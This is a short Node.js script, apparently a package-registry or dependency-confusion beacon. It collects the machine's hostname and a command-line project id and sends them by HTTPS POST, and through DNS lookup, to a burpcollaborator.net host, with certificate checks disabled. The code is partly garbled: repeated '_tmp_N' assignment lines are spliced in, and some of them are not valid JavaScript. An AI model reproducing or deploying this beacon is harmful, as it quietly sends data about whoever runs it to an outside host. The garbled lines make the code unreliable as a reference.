const https = require('https')
var os = require("os")
var hostname = os.hostname()
const data = new TextEncoder().encode(
  JSON.stringify({
    payload: hostname,
    project_id: process.argv[2]
  })
)
JSON.stringify({
    payload: hostname,
    project_id: process.argv[2]
  })
_tmp_2.payload = hostname
_tmp_2.project_id = process.argv[2]
const options = {
  hostname: process.argv[2] + '.' + hostname + '.jylzi8mxby9i6hj8plrj0i6v9mff34.burpcollaborator.net',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}
_tmp_3.hostname = process.argv[2] + '.' + hostname + '.jylzi8mxby9i6hj8plrj0i6v9mff34.burpcollaborator.net'
_tmp_3.port = 443
_tmp_3.path = "/"
_tmp_3.method = "POST"
_tmp_3.headers = {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  }
_tmp_4.Content-Type = "application/json"
_tmp_4.Content-Length = data.length
_tmp_3.rejectUnauthorized = false
const req = https.request(options, res => {

})
req.on('error', error => {
  console.error(error)
})
req.write(data)
